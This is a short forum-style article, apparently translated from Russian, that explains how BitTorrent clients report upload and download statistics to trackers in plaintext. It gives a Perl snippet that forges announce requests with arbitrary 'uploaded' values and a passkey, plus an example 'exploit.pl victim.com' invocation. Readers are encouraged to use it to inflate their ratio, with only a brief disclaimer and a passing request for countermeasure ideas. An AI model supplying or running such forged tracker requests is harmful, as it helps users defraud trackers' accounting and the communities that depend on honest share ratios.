Vulnerability in the bittorrent protocol
Before reading this article I would recommend getting acquainted with the basic terms of the technology (http://ru.wikipedia.org/wiki/BitTorrent); basic knowledge of Perl is also desirable.

Today the BitTorrent protocol is at the peak of its popularity. Hundreds and thousands of terabytes per second rush between peers over fibre-optic backbones and radio links. Millions of files (torrents) appear on trackers. What could disrupt this? In this article I want to discuss and demonstrate the excessive openness and simplicity of the messaging between a tracker and a BitTorrent client. Perhaps this cannot be called a vulnerability, since it poses no real threat to either the server or the client, but it can undermine the functioning of the network and dramatically reduce the overall share ratio.

It is no secret that the indicator of user activity on a tracker is the ratio. The lower it is, the greater the restrictions imposed on the user; a very low ratio may result in deletion of the account. This is especially painful in networks behind NAT, where upload turns out to be miserable. Let's delve into the mechanism of client-server communication and try to improve the ratio.

I will start with a description of the HTTP header sent by most BitTorrent clients (for a detailed description refer to the relevant documentation):

    GET /announce.php?info_hash=%8bz%0d%9b%93%ac%7d%d0%90%60r%03%1b%2b%89%60p%08%96%2e&peer_id=-UT1600-%da%81%bc%ce4%9c%a0%c1k%81%a7%f9&port=6881&uploaded=35302368&downloaded=54454366434&left=177313792&key=F53CB1E7&numwant=200&compact=1&no_peer_id=1 HTTP/1.1
    Host: myhost.com
    User-Agent: uTorrent/1600
    Accept-Encoding: gzip
    Connection: Close

As you can see, all the key parameters are passed in cleartext, and this can be used.
Substituting the parameters in the header (how the variables are obtained everyone can decide for themselves, whether via console or GUI) and sending it to an open tracker over a socket, after converting the file hash into a form the tracker understands:

    # split the 40-character hex info_hash into byte pairs and percent-encode each one
    my @r = $info_hash =~ /(.{1,2})/g;
    $info = join('%', @r);
    $info_hash = "%" . $info;
    my $request = "";
    $request .= "GET /announce.php?passkey=$passkey&info_hash=$info_hash&peer_id=-UT1750-%fa%91%a4IE%22ys%fb%3cCc&port=6881&uploaded=$uploaded&downloaded=$downloaded&left=1037668352&key=E4DC5ED5&event=started&numwant=200&compact=1&no_peer_id=1 HTTP/1.1\r\n";
    $request .= "Host: $host:$port\r\n";
    $request .= "User-Agent: uTorrent/1750\r\n";
    $request .= "Accept-Encoding: gzip\r\n";
    $request .= "Connection: Close\r\n\r\n";
    # $sock is the already-opened TCP connection to the tracker
    print $sock $request;

Check the profile and be pleased with the megabytes received :)

Example:

    perl exploit.pl victim.com 80 1ea9a2766ce3323b3985fddf4a4d11fb 10551598080 0 7E4067D35AE85FF20BFB9D08DCA0E688980CEFB8

This article is for information only; use of this material may result in termination of your account. I would like to hear opinions on this issue and, of course, on ways to solve it. I am aware of some anti-cheat mechanisms, but it seems to me they are not effective. Regarding the layout, don't kick me too much, as the Habrawiki is closed.

Links on the topic:
http://www.securitylab.ru/news/301042.ph...
http://ru.wikipedia.org/wiki/BitTorrent